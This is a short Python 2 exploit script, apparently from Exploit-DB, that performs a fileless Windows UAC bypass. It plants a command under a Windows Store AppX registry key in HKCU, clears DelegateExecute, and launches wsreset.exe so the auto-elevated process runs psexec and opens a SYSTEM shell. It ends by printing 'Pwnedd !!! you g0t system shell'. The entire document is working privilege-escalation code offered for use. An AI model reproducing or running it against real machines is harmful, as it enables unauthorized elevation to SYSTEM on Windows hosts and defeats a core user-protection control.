#### Fileless UAC bypass (WSReset.exe)
#### @404death
#### base on : https://www.activecyber.us/activelabs/windows-uac-bypass
#
## EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47754.zip
#
import sys, os
from ctypes import *
import _winreg
CMD = r"C:\Windows\System32\cmd.exe"
WS_RESET = r'C:\Windows\System32\wsreset.exe'
#PYTHON_CMD = "python"
test_cmd = " -i -s cmd.exe"
SYSTEM_SHELL = "psexec.exe" # to get nt\system
REG_PATH = 'Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command'
DELEGATE_EXEC_REG_KEY = 'DelegateExecute'
def is_running_as_admin():
'''
Checks if the script is running with administrative privileges.
Returns True if is running as admin, False otherwise.
'''
try:
return ctypes.windll.shell32.IsUserAnAdmin()
except:
return False
def create_reg_key(key, value):
'''
Creates a reg key
'''
try:
_winreg.CreateKey(_winreg.HKEY_CURRENT_USER, REG_PATH)
registry_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, REG_PATH, 0, _winreg.KEY_WRITE)
_winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value)
_winreg.CloseKey(registry_key)
except WindowsError:
raise
def bypass_uac(cmd):
'''
Tries to bypass the UAC
'''
try:
create_reg_key(DELEGATE_EXEC_REG_KEY, '')
create_reg_key(None, cmd)
except WindowsError:
raise
def execute():
if not is_running_as_admin():
print '[!] Fileless UAC Bypass via Windows Store by @404death '
print '[+] Trying to bypass the UAC'
print '[+] Waiting to get SYSTEM shell !!!'
try:
current_dir = os.path.dirname(os.path.realpath(__file__)) + '\\' + SYSTEM_SHELL
cmd = '{} /c {} {}'.format(CMD, current_dir, test_cmd)
bypass_uac(cmd)
os.system(WS_RESET)
print '[+] Pwnedd !!! you g0t system shell !!!'
sys.exit(0)
except WindowsError:
sys.exit(1)
else:
print '[+] xailay !!!'
if __name__ == '__main__':
execute()
